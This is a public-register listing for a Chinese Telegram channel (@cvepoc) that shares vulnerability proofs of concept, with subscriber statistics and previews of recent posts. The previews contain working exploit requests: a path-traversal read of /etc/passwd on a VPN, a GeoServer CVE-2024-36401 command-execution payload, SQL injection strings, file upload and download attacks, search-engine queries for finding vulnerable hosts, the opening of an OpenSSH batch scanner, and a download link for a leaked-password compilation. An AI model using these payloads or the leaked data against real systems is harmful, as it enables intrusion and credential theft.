Telegram RegisterThe public register of Telegram
Telegram profile photo for 漏洞先知 【收集全网漏洞】

Channel

漏洞先知 【收集全网漏洞】

@cvepoc

On this record: Growth · Engagement · Reactions · Posts · Cite this entry

218subscribers

-5 since we began measuring on 7 August 2026

Risers and fallers across the register · movement among entries of Under 1,000.

Register entry

Telegram ID-1002009702633
TypeChannel
Username@cvepoc
CreatedBetween 1 November 2023 and 31 May 2024— estimated from Telegram’s id allocation, not measured. How this range is calculated.
First recorded8 August 2026
Last confirmed live29 August 2026
Measurements held5
Confirmed unchanged1 time, most recently 29 August 2026
On Telegramt.me/cvepoc

Growth

218223220.57 August 2026 — 223 subscribers7 August 2026 — 222 subscribers8 August 2026 — 222 subscribers14 August 2026 — 220 subscribers29 August 2026 — 218 subscribers7 August 202629 August 2026
5 measurements spanning 22 days, net -5. Dots are measurements; the straight line between them is drawn to join them, not to claim we know the path taken in between — snapshots are recorded only when a count changes, so gaps mean “no change observed”, never “interpolated”. The vertical axis spans 217–224 and does not start at zero.
Measurement log — every subscribers count we have recorded
Measured (UTC)SubscribersChange
29 Aug 2026, 03:26218-2
14 Aug 2026, 09:55220-2
8 Aug 2026, 10:32222no change
7 Aug 2026, 17:52222-1
7 Aug 2026, 13:16223first reading

Engagement

16 posts held, back to 29 June 2024the reader has not yet reached the start of this channel’s public history, so older posts may sit further back, unread. Read across 1 pageof Telegram’s post history, 20 posts per page.

Nothing published in the last 30 days. ERR and ER are rolling 30-day measures, so there is nothing to compute — we hold 16 posts for this entry, the most recent from 9 August 2024. An engagement rate over an empty window would be a number about nothing.

Reaction mix

4 reactions across 2 posts, in 2 distinct kinds. The most used accounts for 75.0% of them.

Every reaction kind recorded on the sample, most used first
ReactionCountShareShare, drawn
375.0%
👍125.0%

No sentiment is inferred, and none should be read in. This table is ordered by count and by nothing else. Emoji do not carry stable meaning across languages or communities — 🙏 is thanks in one channel and mourning in another — so we publish which ones were pressed and how often, and pass no judgement on what an audience meant by them.

Precision. Telegram publishes reaction counts per emoji and short-forms each one — 4.34K, 1.2M — so any single kind at or above 1,000 reaches us at three significant figures, and only counts below 1,000 are exact. The shares above are ratios of those figures and carry the same error. This is also why the total here can differ slightly from a reaction total printed elsewhere on the page: both are sums of the same rounded parts, taken over samples with different edges.

Coverage. Reactions were read on 2 of the 16 sampled posts in this sample. Summed by Telegram’s own count on each post — not by adding up the per-emoji breakdown above — those same posts carry 4reactions in total: the kind of figure the paragraph above means by “a reaction total printed elsewhere on the page”.

Measured over the 16 most recent posts we hold, published 29 June 2024 to 9 August 2024, using the newest reading held for each. Telegram Stars are excluded: they are a payment, not a reaction, and they have their own section.

Recent posts

9 Aug 2024, 09:36 UTC≈1,860 viewsread 8 August 2026

https://github.com/CloudCrowSec001/CVE-2024-38077-POC

15 Jul 2024, 04:14 UTC≈2,010 views3 reactionsread 8 August 2026

某 BC 系统 pcweb 文件上传漏洞 资源测绘 body="main.e5ee9b2df05fc2d310734b11cc8c911e.css" POC POST /statics/admin/webuploader/0.1.5/server/preview.php HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Acc

3

13 Jul 2024, 08:59 UTC≈1,600 viewsread 8 August 2026

新中小学智慧校园信息管理系统PSE存在任意文件上传 资源测绘 body="/Login/IndexMobi" POC POST /PSE/Upload HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Content-Type: multipart/form-data; boundary=00content0boundary00 Host: Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 Content-Length: 149 Connection: close --00content0boundary00 Content-Dis

13 Jul 2024, 08:55 UTC≈1,330 viewsread 8 August 2026

启明星辰天青汉马VPN-download-client-任意文件读取 资源测绘 app="启明星辰-天清汉马VPN" POC GET /vpn/user/download/client?ostype=../../../../../../../etc/passwd HTTP/1.1 Host: ip User-AgentMozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Content-Length: 2

5 Jul 2024, 12:42 UTC≈1,210 viewsread 8 August 2026

史上最大密码泄露下载:RockYou2024 密码汇编泄露近 100 亿 RockYou2024 是迄今为止最大的密码汇编泄露事件,泄露数据文档中竟包含 9948575739 个独特的明文密码 下载地址: https://s3.timeweb.cloud/fd51ce25-6f95e3f8-263a-4b13-92af-12bc265adb44/rockyou2024.zip #pentest

4 Jul 2024, 01:46 UTC≈1,130 viewsread 8 August 2026

【未公开】Crocus存在Service.do任意文件下载漏洞 资源测绘 body="inp_verification" POC GET /Service.do?Action=Download&Path=C:/windows/win.ini HTTP/1.1 Host: 0.0.0.0

3 Jul 2024, 03:12 UTC986 viewsread 8 August 2026

GeoServer 属性名表达式前台代码执行漏洞(CVE-2024-36401) 基于GET方法的POC GET /geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames=sf:archsites&valueReference=exec(java.lang.Runtime.getRuntime(),'touch%20/tmp/success1') HTTP/1.1 Host: your-ip:8080 Accept-Encoding: gzip, deflate, br Accept: */* Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, lik

2 Jul 2024, 22:56 UTC788 viewsread 8 August 2026

某云APP签名分发系统任意文件上传 资源测绘 body="/api/statistics/service-usage-amount" POC POST /source/pack/upload/2upload/index-uplog.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 C

2 Jul 2024, 10:33 UTC680 viewsread 8 August 2026

该漏洞在实战中被利用的可能性有多大? 该漏洞不太可能被用于远程大规模攻击。理由如下: 漏洞利用条件:该漏洞类型为条件竞争,由于条件竞争漏洞的特性,较难写出稳定的漏洞利用。另外,目前已知的漏洞利用需要绕过ASLR和依赖特定版本的glibc内存结构布局,这意味着攻击者必须事先知道他们针对的 Linux 发行版才能构建功能性漏洞。综上所示,该漏洞难以被规模化的利用于实际攻击中。 漏洞利用难度:虽然目前已有国外安全厂商成功利用该漏洞实现了远程代码执行,但想成功利用此漏洞需要大量持续的发送SSH数据包,目前已知的最少成功利用时间为6-8个小时。此漏洞利用行为类似于SSH暴力破解,这意味着任何现有的暴力破解预防和检测措施都能有效缓解这种攻击,因此在受到良好保护的环境中,该技术的成功率相当低。

2 Jul 2024, 09:46 UTC698 viewsread 8 August 2026

CVE-2024-6387OpenSSH远程代码执行漏洞 | 带自写批量检测脚本 资源测绘 Fofa:protocol="ssh" quake:app:"OpenSSH" hunter:app.name="OpenSSH" POC 多线程,批量跑 来源 暗影网安实验室 import requests from requests.packages.urllib3.exceptions import InsecureRequestWarning import threading import queue from tqdm import tqdm import socket import time import struct import sys import argparse # 禁用InsecureRequestWarning警告 requests.packages.urllib3.disable_warnings(

2 Jul 2024, 02:12 UTC520 viewsread 8 August 2026

【1day】WordPress插件Recall CVE-2024-32709 SQL注入漏洞 资源测绘 "/wp-content/plugins/wp-recall/" POC GET /account/?user=1&tab=groups&group-name=p%27+or+%27%%27=%27%%27+union+all+select+1,2,3,4,5,6,7,8,9,10,11,concat(%22Database:%22,md5(123456),0x7c),13--+- HTTP/1.1 Host: x.x.x.x User-Agent: Mozilla/5.0 (X11; CrOS i686 3912.101.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36 Connection: close

2 Jul 2024, 02:09 UTC499 viewsread 8 August 2026

科荣AIO管理系统-SQL注入-moffice 资源测绘 body="changeAccount('8000')" POC GET /moffice?op=showWorkPlan&planId=1';WAITFOR+DELAY+'0:0:3'--&sid=1 HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-En

Showing the 12 most recent of 16 posts we hold for @cvepoc. View and reaction counts are the latest single reading for each post, not a live figure, and a recent post is still accumulating both. A view count marked was rounded by Telegram before we ever saw it — t.me prints views in full below 1,000 and to three significant figures above, so ≈1,200,000 means somewhere between 1,150,000 and 1,249,999. Unmarked counts are exact. Text is reproduced from the public post preview and truncated for length.

Cite this entry

A live page changes as we take new readings, so a citation should name the measurement it is based on, not just the URL. The line below cites the subscriber count as measured 29 August 2026 — this entry's latest reading, not the date you are reading this.

“漏洞先知 【收集全网漏洞】” (@cvepoc), 218 subscribers as measured 29 August 2026. Telegram Register, tgregister.com/channel/cvepoc.

Full measurement history, CC BY 4.0. Every reading this register holds for this entry, not just the latest one, as a dated, downloadable record: CSV · JSON. Free to use with attribution to tgregister.com. Each file carries its own generation timestamp, which is the figure to cite for exactly when the data was retrieved.